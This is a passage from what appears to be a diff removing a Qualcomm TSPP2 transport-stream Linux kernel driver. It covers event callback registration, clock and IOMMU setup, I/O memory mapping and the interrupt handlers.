--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EPERM;
--	}
--
--	if (!src->opened) {
--		pr_err("%s: Source not opened\n", __func__);
--		goto err_inval;
--	}
--
--	if (((src->input == TSPP2_INPUT_TSIF0) ||
--		(src->input == TSPP2_INPUT_TSIF1)) &&
--		((src_event_bitmask & TSPP2_SRC_EVENT_MEMORY_READ_ERROR) ||
--		(src_event_bitmask & TSPP2_SRC_EVENT_FLOW_CTRL_STALL))) {
--		pr_err("%s: Invalid event bitmask for a source with TSIF input\n",
--				__func__);
--		goto err_inval;
--	}
--
--	if ((src->input == TSPP2_INPUT_MEMORY) &&
--		((src_event_bitmask & TSPP2_SRC_EVENT_TSIF_LOST_SYNC) ||
--		(src_event_bitmask & TSPP2_SRC_EVENT_TSIF_TIMEOUT) ||
--		(src_event_bitmask & TSPP2_SRC_EVENT_TSIF_OVERFLOW) ||
--		(src_event_bitmask & TSPP2_SRC_EVENT_TSIF_PKT_READ_ERROR) ||
--		(src_event_bitmask & TSPP2_SRC_EVENT_TSIF_PKT_WRITE_ERROR))) {
--		pr_err("%s: Invalid event bitmask for a source with memory input\n",
--			__func__);
--		goto err_inval;
--	}
--
--	spin_lock_irqsave(&src->device->spinlock, flags);
--	src->event_callback = callback;
--	src->event_cookie = cookie;
--	src->event_bitmask = src_event_bitmask;
--	spin_unlock_irqrestore(&src->device->spinlock, flags);
--
--	/* Enable/disable flow control stall interrupt on the source */
--	reg = readl_relaxed(src->device->base + TSPP2_GLOBAL_IRQ_ENABLE);
--	if (callback && (src_event_bitmask & TSPP2_SRC_EVENT_FLOW_CTRL_STALL)) {
--		reg |= ((0x1 << src->hw_index) <<
--			GLOBAL_IRQ_FC_STALL_OFFS);
--	} else {
--		reg &= ~((0x1 << src->hw_index) <<
--			GLOBAL_IRQ_FC_STALL_OFFS);
--	}
--	writel_relaxed(reg, src->device->base + TSPP2_GLOBAL_IRQ_ENABLE);
--
--	mutex_unlock(&src->device->mutex);
--
--	pm_runtime_mark_last_busy(src->device->dev);
--	pm_runtime_put_autosuspend(src->device->dev);
--
--	dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--
--err_inval:
--	mutex_unlock(&src->device->mutex);
--	pm_runtime_mark_last_busy(src->device->dev);
--	pm_runtime_put_autosuspend(src->device->dev);
--
--	return -EINVAL;
--}
--EXPORT_SYMBOL(tspp2_src_event_notification_register);
--
--/**
-- * tspp2_filter_event_notification_register() - Get notified on a filter event.
-- *
-- * @filter_handle:		Filter handle.
-- * @filter_event_bitmask:	A bitmask of filter events,
-- *				TSPP2_FILTER_EVENT_XXX.
-- * @callback:			User callback function.
-- * @cookie:			User information passed to the callback.
-- *
-- * Register a user callback which will be invoked when certain filter
-- * events occur. Note the values (mask, callback and cookie) are overwritten
-- * when calling this function multiple times. Therefore it is possible to
-- * "unregister" a callback by calling this function with the bitmask set to 0
-- * and with NULL callback and cookie.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_filter_event_notification_register(u32 filter_handle,
--			u32 filter_event_bitmask,
--			void (*callback)(void *cookie, u32 event_bitmask),
--			void *cookie)
--{
--	int ret;
--	int idx;
--	u32 reg;
--	unsigned long flags;
--	struct tspp2_filter *filter = (struct tspp2_filter *)filter_handle;
--
--	if (!filter) {
--		pr_err("%s: Invalid filter handle\n", __func__);
--		return -EINVAL;
--	}
--
--	ret = pm_runtime_get_sync(filter->device->dev);
--	if (ret < 0)
--		return ret;
--
--	if (mutex_lock_interruptible(&filter->device->mutex)) {
--		pm_runtime_mark_last_busy(filter->device->dev);
--		pm_runtime_put_autosuspend(filter->device->dev);
--		return -ERESTARTSYS;
--	}
--
--	if (!filter->device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&filter->device->mutex);
--		pm_runtime_mark_last_busy(filter->device->dev);
--		pm_runtime_put_autosuspend(filter->device->dev);
--		return -EPERM;
--	}
--
--	if (!filter->opened) {
--		pr_err("%s: Filter not opened\n", __func__);
--		mutex_unlock(&filter->device->mutex);
--		pm_runtime_mark_last_busy(filter->device->dev);
--		pm_runtime_put_autosuspend(filter->device->dev);
--		return -EINVAL;
--	}
--
--	spin_lock_irqsave(&filter->device->spinlock, flags);
--	filter->event_callback = callback;
--	filter->event_cookie = cookie;
--	filter->event_bitmask = filter_event_bitmask;
--	spin_unlock_irqrestore(&filter->device->spinlock, flags);
--
--	/* Enable/disable SC high/low interrupts per filter as requested */
--	idx = (filter->context >> 5);
--	reg = readl_relaxed(filter->device->base +
--		TSPP2_SC_GO_HIGH_ENABLE(idx));
--	if (callback &&
--		(filter_event_bitmask & TSPP2_FILTER_EVENT_SCRAMBLING_HIGH)) {
--		reg |= (0x1 << TSPP2_MODULUS_OP(filter->context, 32));
--	} else {
--		reg &= ~(0x1 << TSPP2_MODULUS_OP(filter->context, 32));
--	}
--	writel_relaxed(reg, filter->device->base +
--		TSPP2_SC_GO_HIGH_ENABLE(idx));
--
--	reg = readl_relaxed(filter->device->base +
--		TSPP2_SC_GO_LOW_ENABLE(idx));
--	if (callback &&
--		(filter_event_bitmask & TSPP2_FILTER_EVENT_SCRAMBLING_LOW)) {
--		reg |= (0x1 << TSPP2_MODULUS_OP(filter->context, 32));
--	} else {
--		reg &= ~(0x1 << TSPP2_MODULUS_OP(filter->context, 32));
--	}
--	writel_relaxed(reg, filter->device->base +
--		TSPP2_SC_GO_LOW_ENABLE(idx));
--
--	mutex_unlock(&filter->device->mutex);
--
--	pm_runtime_mark_last_busy(filter->device->dev);
--	pm_runtime_put_autosuspend(filter->device->dev);
--
--	dev_dbg(filter->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_filter_event_notification_register);
--
--/**
-- * tspp2_get_filter_hw_index() - Get a filter's hardware index.
-- *
-- * @filter_handle:		Filter handle.
-- *
-- * This is an helper function to support tspp2 auto-testing.
-- *
-- * Return the filter's hardware index on success, error value otherwise.
-- */
--int tspp2_get_filter_hw_index(u32 filter_handle)
--{
--	struct tspp2_filter *filter = (struct tspp2_filter *)filter_handle;
--	if (!filter_handle)
--		return -EINVAL;
--	return filter->hw_index;
--}
--EXPORT_SYMBOL(tspp2_get_filter_hw_index);
--
--/**
-- * tspp2_get_reserved_hw_index() - Get a source's reserved hardware index.
-- *
-- * @src_handle:		Source handle.
-- *
-- * This is an helper function to support tspp2 auto-testing.
-- *
-- * Return the source's reserved hardware index on success,
-- * error value otherwise.
-- */
--int tspp2_get_reserved_hw_index(u32 src_handle)
--{
--	struct tspp2_src *src = (struct tspp2_src *)src_handle;
--	if (!src_handle)
--		return -EINVAL;
--	return src->reserved_filter_hw_index;
--}
--EXPORT_SYMBOL(tspp2_get_reserved_hw_index);
--
--/**
-- * tspp2_get_ops_array() - Get filter's operations.
-- *
-- * @filter_handle:		Filter handle.
-- * @ops_array:			The filter's operations.
-- * @num_of_ops:			The filter's number of operations.
-- *
-- * This is an helper function to support tspp2 auto-testing.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_get_ops_array(u32 filter_handle,
--		struct tspp2_operation ops_array[TSPP2_MAX_OPS_PER_FILTER],
--		u8 *num_of_ops)
--{
--	int i;
--	struct tspp2_filter *filter = (struct tspp2_filter *)filter_handle;
--	if (!filter_handle || !num_of_ops)
--		return -EINVAL;
--	*num_of_ops = filter->num_user_operations;
--	for (i = 0; i < *num_of_ops; i++)
--		ops_array[i] = filter->operations[i];
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_get_ops_array);
--
--/* Platform driver related functions: */
--
--/**
-- * msm_tspp2_dt_to_pdata() - Copy device-tree data to platfrom data structure.
-- *
-- * @pdev:	Platform device.
-- *
-- * Return pointer to allocated platform data on success, NULL on failure.
-- */
--static struct msm_tspp2_platform_data *
--msm_tspp2_dt_to_pdata(struct platform_device *pdev)
--{
--	struct device_node *node = pdev->dev.of_node;
--	struct msm_tspp2_platform_data *data;
--	int rc;
--
--	/* Note: memory allocated by devm_kzalloc is freed automatically */
--	data = devm_kzalloc(&pdev->dev, sizeof(*data), GFP_KERNEL);
--	if (!data) {
--		pr_err("%s: Unable to allocate platform data\n", __func__);
--		return NULL;
--	}
--
--	/* Get power regulator */
--	if (!of_get_property(node, "vdd-supply", NULL)) {
--		pr_err("%s: Could not find vdd-supply property\n", __func__);
--		return NULL;
--	}
--
--	/* Get IOMMU information */
--	rc = of_property_read_string(node, "qcom,iommu-hlos-group",
--					&data->hlos_group);
--	if (rc) {
--		pr_err("%s: Could not find iommu-hlos-group property, err = %d\n",
--			__func__, rc);
--		return NULL;
--	}
--	rc = of_property_read_string(node, "qcom,iommu-cpz-group",
--					&data->cpz_group);
--	if (rc) {
--		pr_err("%s: Could not find iommu-cpz-group property, err = %d\n",
--			__func__, rc);
--		return NULL;
--	}
--	rc = of_property_read_u32(node, "qcom,iommu-hlos-partition",
--					&data->hlos_partition);
--	if (rc) {
--		pr_err("%s: Could not find iommu-hlos-partition property, err = %d\n",
--			__func__, rc);
--		return NULL;
--	}
--	rc = of_property_read_u32(node, "qcom,iommu-cpz-partition",
--					&data->cpz_partition);
--	if (rc) {
--		pr_err("%s: Could not find iommu-cpz-partition property, err = %d\n",
--			__func__, rc);
--		return NULL;
--	}
--
--	return data;
--}
--
--static void msm_tspp2_iommu_info_free(struct tspp2_device *device)
--{
--	if (device->iommu_info.hlos_group) {
--		iommu_group_put(device->iommu_info.hlos_group);
--		device->iommu_info.hlos_group = NULL;
--	}
--
--	if (device->iommu_info.cpz_group) {
--		iommu_group_put(device->iommu_info.cpz_group);
--		device->iommu_info.cpz_group = NULL;
--	}
--
--	device->iommu_info.hlos_domain = NULL;
--	device->iommu_info.cpz_domain = NULL;
--	device->iommu_info.hlos_domain_num = -1;
--	device->iommu_info.cpz_domain_num = -1;
--	device->iommu_info.hlos_partition = -1;
--	device->iommu_info.cpz_partition = -1;
--}
--
--/**
-- * msm_tspp2_iommu_info_get() - Get IOMMU information.
-- *
-- * @pdev:	Platform device, containing platform information.
-- * @device:	TSPP2 device.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int msm_tspp2_iommu_info_get(struct platform_device *pdev,
--						struct tspp2_device *device)
--{
--	int ret = 0;
--	struct msm_tspp2_platform_data *data = pdev->dev.platform_data;
--
--	device->iommu_info.hlos_group = NULL;
--	device->iommu_info.cpz_group = NULL;
--	device->iommu_info.hlos_domain = NULL;
--	device->iommu_info.cpz_domain = NULL;
--	device->iommu_info.hlos_domain_num = -1;
--	device->iommu_info.cpz_domain_num = -1;
--	device->iommu_info.hlos_partition = -1;
--	device->iommu_info.cpz_partition = -1;
--
--	device->iommu_info.hlos_group = iommu_group_find(data->hlos_group);
--	if (!device->iommu_info.hlos_group) {
--		dev_err(&pdev->dev, "%s: Cannot find IOMMU HLOS group",
--			__func__);
--		ret = -EINVAL;
--		goto err_out;
--	}
--	device->iommu_info.cpz_group = iommu_group_find(data->cpz_group);
--	if (!device->iommu_info.cpz_group) {
--		dev_err(&pdev->dev, "%s: Cannot find IOMMU CPZ group",
--			__func__);
--		ret = -EINVAL;
--		goto err_out;
--	}
--
--	device->iommu_info.hlos_domain =
--		iommu_group_get_iommudata(device->iommu_info.hlos_group);
--	if (IS_ERR_OR_NULL(device->iommu_info.hlos_domain)) {
--		dev_err(&pdev->dev, "%s: iommu_group_get_iommudata failed",
--			__func__);
--		ret = -EINVAL;
--		goto err_out;
--	}
--
--	device->iommu_info.cpz_domain =
--		iommu_group_get_iommudata(device->iommu_info.cpz_group);
--	if (IS_ERR_OR_NULL(device->iommu_info.cpz_domain)) {
--		device->iommu_info.hlos_domain = NULL;
--		dev_err(&pdev->dev, "%s: iommu_group_get_iommudata failed",
--			__func__);
--		ret = -EINVAL;
--		goto err_out;
--	}
--
--	device->iommu_info.hlos_domain_num =
--			msm_find_domain_no(device->iommu_info.hlos_domain);
--	device->iommu_info.cpz_domain_num =
--			msm_find_domain_no(device->iommu_info.cpz_domain);
--	device->iommu_info.hlos_partition = data->hlos_partition;
--	device->iommu_info.cpz_partition = data->cpz_partition;
--
--	return 0;
--
--err_out:
--	msm_tspp2_iommu_info_free(device);
--
--	return ret;
--}
--
--/**
-- * tspp2_clocks_put() - Put clocks and disable regulator.
-- *
-- * @device:	TSPP2 device.
-- */
--static void tspp2_clocks_put(struct tspp2_device *device)
--{
--	if (device->tsif_ref_clk)
--		clk_put(device->tsif_ref_clk);
--
--	if (device->tspp2_klm_ahb_clk)
--		clk_put(device->tspp2_klm_ahb_clk);
--
--	if (device->tspp2_vbif_clk)
--		clk_put(device->tspp2_vbif_clk);
--
--	if (device->vbif_ahb_clk)
--		clk_put(device->vbif_ahb_clk);
--
--	if (device->vbif_axi_clk)
--		clk_put(device->vbif_axi_clk);
--
--	if (device->tspp2_core_clk)
--		clk_put(device->tspp2_core_clk);
--
--	if (device->tspp2_ahb_clk)
--		clk_put(device->tspp2_ahb_clk);
--
--	device->tspp2_ahb_clk = NULL;
--	device->tspp2_core_clk = NULL;
--	device->tspp2_vbif_clk = NULL;
--	device->vbif_ahb_clk = NULL;
--	device->vbif_axi_clk = NULL;
--	device->tspp2_klm_ahb_clk = NULL;
--	device->tsif_ref_clk = NULL;
--}
--
--/**
-- * msm_tspp2_clocks_setup() - Get clocks and set their rate, enable regulator.
-- *
-- * @pdev:	Platform device, containing platform information.
-- * @device:	TSPP2 device.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int msm_tspp2_clocks_setup(struct platform_device *pdev,
--						struct tspp2_device *device)
--{
--	int ret = 0;
--	unsigned long rate_in_hz = 0;
--	struct clk *tspp2_core_clk_src = NULL;
--
--	/* Get power regulator (GDSC) */
--	device->gdsc = devm_regulator_get(&pdev->dev, "vdd");
--	if (IS_ERR(device->gdsc)) {
--		pr_err("%s: Failed to get vdd power regulator\n", __func__);
--		ret = PTR_ERR(device->gdsc);
--		device->gdsc = NULL;
--		return ret;
--	}
--
--	device->tspp2_ahb_clk = NULL;
--	device->tspp2_core_clk = NULL;
--	device->tspp2_vbif_clk = NULL;
--	device->vbif_ahb_clk = NULL;
--	device->vbif_axi_clk = NULL;
--	device->tspp2_klm_ahb_clk = NULL;
--	device->tsif_ref_clk = NULL;
--
--	device->tspp2_ahb_clk = clk_get(&pdev->dev, "bcc_tspp2_ahb_clk");
--	if (IS_ERR(device->tspp2_ahb_clk)) {
--		pr_err("%s: Failed to get %s", __func__, "bcc_tspp2_ahb_clk");
--		ret = PTR_ERR(device->tspp2_ahb_clk);
--		device->tspp2_ahb_clk = NULL;
--		goto err_clocks;
--	}
--
--	device->tspp2_core_clk = clk_get(&pdev->dev, "bcc_tspp2_core_clk");
--	if (IS_ERR(device->tspp2_core_clk)) {
--		pr_err("%s: Failed to get %s", __func__, "bcc_tspp2_core_clk");
--		ret = PTR_ERR(device->tspp2_core_clk);
--		device->tspp2_core_clk = NULL;
--		goto err_clocks;
--	}
--
--	device->tspp2_vbif_clk = clk_get(&pdev->dev, "bcc_vbif_tspp2_clk");
--	if (IS_ERR(device->tspp2_vbif_clk)) {
--		pr_err("%s: Failed to get %s", __func__, "bcc_vbif_tspp2_clk");
--		ret = PTR_ERR(device->tspp2_vbif_clk);
--		device->tspp2_vbif_clk = NULL;
--		goto err_clocks;
--	}
--
--	device->vbif_ahb_clk = clk_get(&pdev->dev, "iface_vbif_clk");
--	if (IS_ERR(device->vbif_ahb_clk)) {
--		pr_err("%s: Failed to get %s", __func__, "iface_vbif_clk");
--		ret = PTR_ERR(device->vbif_ahb_clk);
--		device->vbif_ahb_clk = NULL;
--		goto err_clocks;
--	}
--
--	device->vbif_axi_clk = clk_get(&pdev->dev, "vbif_core_clk");
--	if (IS_ERR(device->vbif_axi_clk)) {
--		pr_err("%s: Failed to get %s", __func__, "vbif_core_clk");
--		ret = PTR_ERR(device->vbif_axi_clk);
--		device->vbif_axi_clk = NULL;
--		goto err_clocks;
--	}
--
--	device->tspp2_klm_ahb_clk = clk_get(&pdev->dev, "bcc_klm_ahb_clk");
--	if (IS_ERR(device->tspp2_klm_ahb_clk)) {
--		pr_err("%s: Failed to get %s", __func__, "bcc_klm_ahb_clk");
--		ret = PTR_ERR(device->tspp2_klm_ahb_clk);
--		device->tspp2_klm_ahb_clk = NULL;
--		goto err_clocks;
--	}
--
--	device->tsif_ref_clk = clk_get(&pdev->dev, "gcc_tsif_ref_clk");
--	if (IS_ERR(device->tsif_ref_clk)) {
--		pr_err("%s: Failed to get %s", __func__, "gcc_tsif_ref_clk");
--		ret = PTR_ERR(device->tsif_ref_clk);
--		device->tsif_ref_clk = NULL;
--		goto err_clocks;
--	}
--
--	/* Set relevant clock rates */
--	rate_in_hz = clk_round_rate(device->tsif_ref_clk, 1);
--	if (clk_set_rate(device->tsif_ref_clk, rate_in_hz)) {
--		pr_err("%s: Failed to set rate %lu to %s\n", __func__,
--			rate_in_hz, "gcc_tsif_ref_clk");
--		goto err_clocks;
--	}
--
--	/* We need to set the rate of tspp2_core_clk_src */
--	tspp2_core_clk_src = clk_get_parent(device->tspp2_core_clk);
--	if (tspp2_core_clk_src) {
--		rate_in_hz = clk_round_rate(tspp2_core_clk_src, 1);
--		if (clk_set_rate(tspp2_core_clk_src, rate_in_hz)) {
--			pr_err("%s: Failed to set rate %lu to tspp2_core_clk_src\n",
--				__func__, rate_in_hz);
--			goto err_clocks;
--		}
--	} else {
--		pr_err("%s: Failed to get tspp2_core_clk parent\n", __func__);
--		goto err_clocks;
--	}
--
--	return 0;
--
--err_clocks:
--	tspp2_clocks_put(device);
--
--	return ret;
--}
--
--/**
-- * msm_tspp2_map_io_memory() - Map memory resources to kernel space.
-- *
-- * @pdev:	Platform device, containing platform information.
-- * @device:	TSPP2 device.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int msm_tspp2_map_io_memory(struct platform_device *pdev,
--						struct tspp2_device *device)
--{
--	struct resource *mem_tsif0;
--	struct resource *mem_tsif1;
--	struct resource *mem_tspp2;
--	struct resource *mem_bam;
--
--	/* Get memory resources */
--	mem_tsif0 = platform_get_resource_byname(pdev,
--				IORESOURCE_MEM, "MSM_TSIF0");
--	if (!mem_tsif0) {
--		dev_err(&pdev->dev, "%s: Missing TSIF0 MEM resource", __func__);
--		return -ENXIO;
--	}
--
--	mem_tsif1 = platform_get_resource_byname(pdev,
--				IORESOURCE_MEM, "MSM_TSIF1");
--	if (!mem_tsif1) {
--		dev_err(&pdev->dev, "%s: Missing TSIF1 MEM resource", __func__);
--		return -ENXIO;
--	}
--
--	mem_tspp2 = platform_get_resource_byname(pdev,
--				IORESOURCE_MEM, "MSM_TSPP2");
--	if (!mem_tspp2) {
--		dev_err(&pdev->dev, "%s: Missing TSPP2 MEM resource", __func__);
--		return -ENXIO;
--	}
--
--	mem_bam = platform_get_resource_byname(pdev,
--				IORESOURCE_MEM, "MSM_TSPP2_BAM");
--	if (!mem_bam) {
--		dev_err(&pdev->dev, "%s: Missing BAM MEM resource", __func__);
--		return -ENXIO;
--	}
--
--	/* Map memory physical addresses to kernel space */
--	device->tsif_devices[0].base = ioremap(mem_tsif0->start,
--		resource_size(mem_tsif0));
--	if (!device->tsif_devices[0].base) {
--		dev_err(&pdev->dev, "%s: ioremap failed", __func__);
--		goto err_map_tsif0;
--	}
--
--	device->tsif_devices[1].base = ioremap(mem_tsif1->start,
--		resource_size(mem_tsif1));
--	if (!device->tsif_devices[1].base) {
--		dev_err(&pdev->dev, "%s: ioremap failed", __func__);
--		goto err_map_tsif1;
--	}
--
--	device->base = ioremap(mem_tspp2->start, resource_size(mem_tspp2));
--	if (!device->base) {
--		dev_err(&pdev->dev, "%s: ioremap failed", __func__);
--		goto err_map_dev;
--	}
--
--	memset(&device->bam_props, 0, sizeof(device->bam_props));
--	device->bam_props.phys_addr = mem_bam->start;
--	device->bam_props.virt_addr = ioremap(mem_bam->start,
--		resource_size(mem_bam));
--	if (!device->bam_props.virt_addr) {
--		dev_err(&pdev->dev, "%s: ioremap failed", __func__);
--		goto err_map_bam;
--	}
--
--	return 0;
--
--err_map_bam:
--	iounmap(device->base);
--
--err_map_dev:
--	iounmap(device->tsif_devices[1].base);
--
--err_map_tsif1:
--	iounmap(device->tsif_devices[0].base);
--
--err_map_tsif0:
--	return -ENXIO;
--}
--
--/**
-- * tspp2_event_work_prepare() - Prepare and queue a work element.
-- *
-- * @device:		TSPP2 device.
-- * @callback:		User callback to invoke.
-- * @cookie:		User cookie.
-- * @event_bitmask:	Event bitmask
-- *
-- * Get a free work element from the pool, prepare it and queue it
-- * to the work queue. When scheduled, the work will invoke the user callback
-- * for the event that the HW reported.
-- */
--static void tspp2_event_work_prepare(struct tspp2_device *device,
--			void (*callback)(void *cookie, u32 event_bitmask),
--			void *cookie,
--			u32 event_bitmask)
--{
--	struct tspp2_event_work *work = NULL;
--
--	if (!list_empty(&device->free_work_list)) {
--		work = list_first_entry(&device->free_work_list,
--			struct tspp2_event_work, link);
--		list_del(&work->link);
--		work->callback = callback;
--		work->cookie = cookie;
--		work->event_bitmask = event_bitmask;
--		queue_work(device->work_queue, &work->work);
--	} else {
--		pr_warn("%s: No available work element\n", __func__);
--	}
--}
--
--/**
-- * tspp2_isr() - TSPP2 interrupt handler.
-- *
-- * @irq:	Interrupt number.
-- * @dev:	TSPP2 device.
-- *
-- * Handle TSPP2 HW interrupt. Collect relevant statistics and invoke
-- * user registered callbacks for global, source or filter events.
-- *
-- * Return IRQ_HANDLED.
-- */
--static irqreturn_t tspp2_isr(int irq, void *dev)
--{
--	struct tspp2_device *device = dev;
--	struct tspp2_src *src = NULL;
--	struct tspp2_filter *f = NULL;
--	unsigned long ext_reg = 0;
--	unsigned long val = 0;
--	unsigned long flags;
--	u32 i = 0, j = 0;
--	u32 global_bitmask = 0;
--	u32 src_bitmask[TSPP2_NUM_MEM_INPUTS] = {0};
--	u32 filter_bitmask[TSPP2_NUM_CONTEXTS] = {0};
--	u32 reg = 0;
--
--	reg = readl_relaxed(device->base + TSPP2_GLOBAL_IRQ_STATUS);
--
--	if (reg & (0x1 << GLOBAL_IRQ_TSP_INVALID_AF_OFFS)) {
--		device->irq_stats.global.tsp_invalid_af_control++;
--		global_bitmask |= TSPP2_GLOBAL_EVENT_INVALID_AF_CTRL;
--	}
--
--	if (reg & (0x1 << GLOBAL_IRQ_TSP_INVALID_LEN_OFFS)) {
--		device->irq_stats.global.tsp_invalid_length++;
--		global_bitmask |= TSPP2_GLOBAL_EVENT_INVALID_AF_LENGTH;
--	}
--
--	if (reg & (0x1 << GLOBAL_IRQ_PES_NO_SYNC_OFFS)) {
--		device->irq_stats.global.pes_no_sync++;
--		global_bitmask |= TSPP2_GLOBAL_EVENT_PES_NO_SYNC;
--	}
--
--	if (reg & (0x1 << GLOBAL_IRQ_ENCRYPT_LEVEL_ERR_OFFS))
--		device->irq_stats.global.encrypt_level_err++;
--
--	if (reg & (0x1 << GLOBAL_IRQ_KEY_NOT_READY_OFFS)) {
--		ext_reg = readl_relaxed(device->base +
--				TSPP2_KEY_NOT_READY_IRQ_STATUS);
--		for_each_set_bit(i, &ext_reg, TSPP2_NUM_KEYTABLES)
--			device->irq_stats.kt[i].key_not_ready++;
--		writel_relaxed(ext_reg, device->base +
--			TSPP2_KEY_NOT_READY_IRQ_CLEAR);
--	}
--
--	if (reg & (0x1 << GLOBAL_IRQ_UNEXPECTED_RESET_OFFS)) {
--		ext_reg = readl_relaxed(device->base +
--				TSPP2_UNEXPECTED_RST_IRQ_STATUS);
--		for_each_set_bit(i, &ext_reg, TSPP2_NUM_PIPES)
--			device->irq_stats.pipe[i].unexpected_reset++;
--		writel_relaxed(ext_reg, device->base +
--			TSPP2_UNEXPECTED_RST_IRQ_CLEAR);
--	}
--
--	if (reg & (0x1 << GLOBAL_IRQ_WRONG_PIPE_DIR_OFFS)) {
--		ext_reg = readl_relaxed(device->base +
--				TSPP2_WRONG_PIPE_DIR_IRQ_STATUS);
--		for_each_set_bit(i, &ext_reg, TSPP2_NUM_PIPES)
--			device->irq_stats.pipe[i].wrong_pipe_direction++;
--		writel_relaxed(ext_reg, device->base +
--			TSPP2_WRONG_PIPE_DIR_IRQ_CLEAR);
--	}
--
--	if (reg & (0x1 << GLOBAL_IRQ_QSB_RESP_ERR_OFFS)) {
--		global_bitmask |= TSPP2_GLOBAL_EVENT_TX_FAIL;
--		ext_reg = readl_relaxed(device->base +
--				TSPP2_QSB_RESPONSE_ERROR_IRQ_STATUS);
--		for_each_set_bit(i, &ext_reg, TSPP2_NUM_PIPES)
--			device->irq_stats.pipe[i].qsb_response_error++;
--		writel_relaxed(ext_reg, device->base +
--			TSPP2_QSB_RESPONSE_ERROR_IRQ_CLEAR);
--	}
--
--	if (reg & (0x1 << GLOBAL_IRQ_SC_GO_HIGH_OFFS)) {
--		for (j = 0; j < 3; j++) {
--			ext_reg = readl_relaxed(device->base +
--					TSPP2_SC_GO_HIGH_STATUS(j));
--			for_each_set_bit(i, &ext_reg, 32) {
--				filter_bitmask[j*32 + i] |=
--					TSPP2_FILTER_EVENT_SCRAMBLING_HIGH;
--				device->irq_stats.ctx[j*32 + i].sc_go_high++;
--			}
--			writel_relaxed(ext_reg, device->base +
--					TSPP2_SC_GO_HIGH_CLEAR(j));
--		}
--	}
--
--	if (reg & (0x1 << GLOBAL_IRQ_SC_GO_LOW_OFFS)) {
--		for (j = 0; j < 3; j++) {
--			ext_reg = readl_relaxed(device->base +
--					TSPP2_SC_GO_LOW_STATUS(j));
--			for_each_set_bit(i, &ext_reg, 32) {
--				filter_bitmask[j*32 + i] |=
--					TSPP2_FILTER_EVENT_SCRAMBLING_LOW;
--				device->irq_stats.ctx[j*32 + i].sc_go_low++;
--			}
--			writel_relaxed(ext_reg, device->base +
--					TSPP2_SC_GO_LOW_CLEAR(j));
--		}
--	}
--
--	if (reg & (0xFF << GLOBAL_IRQ_READ_FAIL_OFFS)) {
--		val = ((reg & (0xFF << GLOBAL_IRQ_READ_FAIL_OFFS)) >>
--			GLOBAL_IRQ_READ_FAIL_OFFS);
--		for_each_set_bit(i, &val, TSPP2_NUM_MEM_INPUTS) {
--			src_bitmask[i] |= TSPP2_SRC_EVENT_MEMORY_READ_ERROR;
--			device->irq_stats.src[i].read_failure++;
--		}
--	}
--
--	if (reg & (0xFF << GLOBAL_IRQ_FC_STALL_OFFS)) {
--		val = ((reg & (0xFF << GLOBAL_IRQ_FC_STALL_OFFS)) >>
--			GLOBAL_IRQ_FC_STALL_OFFS);
--		for_each_set_bit(i, &val, TSPP2_NUM_MEM_INPUTS) {
--			src_bitmask[i] |= TSPP2_SRC_EVENT_FLOW_CTRL_STALL;
--			device->irq_stats.src[i].flow_control_stall++;
--		}
--	}
--
--	spin_lock_irqsave(&device->spinlock, flags);
--
--	/* Invoke user callback for global events */
--	if (device->event_callback && (global_bitmask & device->event_bitmask))
--		tspp2_event_work_prepare(device, device->event_callback,
--			device->event_cookie,
--			(global_bitmask & device->event_bitmask));
--
--	/* Invoke user callbacks on memory source events */
--	for (i = 0; i < TSPP2_NUM_MEM_INPUTS; i++) {
--		src = &device->mem_sources[i];
--		if (src->event_callback &&
--			(src_bitmask[src->hw_index] & src->event_bitmask))
--			tspp2_event_work_prepare(device,
--				src->event_callback,
--				src->event_cookie,
--				(src_bitmask[src->hw_index] &
--					src->event_bitmask));
--	}
--
--	/* Invoke user callbacks on filter events */
--	for (i = 0; i < TSPP2_NUM_AVAIL_FILTERS; i++) {
--		f = &device->filters[i];
--		if (f->event_callback &&
--			(f->event_bitmask & filter_bitmask[f->context]))
--			tspp2_event_work_prepare(device,
--				f->event_callback,
--				f->event_cookie,
--				(f->event_bitmask &
--					filter_bitmask[f->context]));
--	}
--
--	spin_unlock_irqrestore(&device->spinlock, flags);
--
--	/*
--	 * Clear global interrupts. Note bits [9:4] are an aggregation of
--	 * other IRQs, and are reserved in the TSPP2_GLOBAL_IRQ_CLEAR register.
--	 */
--	reg &= ~(0x0FFF << GLOBAL_IRQ_CLEAR_RESERVED_OFFS);
--	writel_relaxed(reg, device->base + TSPP2_GLOBAL_IRQ_CLEAR);
--	/*
--	 * Before returning IRQ_HANDLED to the generic interrupt handling
--	 * framework, we need to make sure all operations, including clearing of
--	 * interrupt status registers in the hardware, are performed.
--	 * Thus a barrier after clearing the interrupt status register
--	 * is required to guarantee that the interrupt status register has
--	 * really been cleared by the time we return from this handler.
--	 */
--	wmb();
--
--	return IRQ_HANDLED;
--}
--
--/**
-- * tsif_isr() - TSIF interrupt handler.
-- *
-- * @irq:	Interrupt number.
-- * @dev:	TSIF device that generated the interrupt.
-- *
-- * Handle TSIF HW interrupt. Collect HW statistics and, if the user registered
-- * a relevant source callback, invoke it.
-- *
-- * Return IRQ_HANDLED on success, IRQ_NONE on irrelevant interrupts.
-- */
--static irqreturn_t tsif_isr(int irq, void *dev)
--{
--	u32 src_bitmask = 0;
--	unsigned long flags;
--	struct tspp2_src *src = NULL;
--	struct tspp2_tsif_device *tsif_device = dev;
--	u32 sts_ctl = 0;
--
--	sts_ctl = readl_relaxed(tsif_device->base + TSPP2_TSIF_STS_CTL);
--
--	if (!(sts_ctl & (TSIF_STS_CTL_PACK_AVAIL	|
--			TSIF_STS_CTL_PKT_WRITE_ERR	|
--			TSIF_STS_CTL_PKT_READ_ERR	|
--			TSIF_STS_CTL_OVERFLOW		|
--			TSIF_STS_CTL_LOST_SYNC		|
--			TSIF_STS_CTL_TIMEOUT))) {
--		return IRQ_NONE;
--	}
--
--	if (sts_ctl & TSIF_STS_CTL_PKT_WRITE_ERR) {
